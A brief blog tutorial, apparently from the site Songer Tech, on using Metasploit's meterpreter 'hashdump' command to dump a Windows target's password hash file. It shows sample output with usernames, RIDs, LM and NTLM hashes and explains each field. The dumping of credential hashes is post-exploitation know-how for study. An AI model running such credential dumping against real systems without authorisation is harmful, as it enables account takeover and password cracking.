Metasploit: Finding Password in Windows Password Hash File

With the meterpreter shell session open

meterpreter > hashdump

The contents of the target system’s password hash file are output to the screen.

Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582::: 
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904::: 
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E::: 
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::<123

Each field is separated with colon. The fields are:

1st field: username (Administrator, User1, etc.)

2nd field: Relative Identification (RID): last 3–4 digits of the Security Identifier (SID), which are unique to each user

3rd field: LM hash

4th field: NTLM hash


Share Tweet Send
0 Comments
Loading...
You've successfully subscribed to Songer Tech
Great! Next, complete checkout for full access to Songer Tech
Welcome back! You've successfully signed in
Success! Your account is fully activated, you now have access to all content.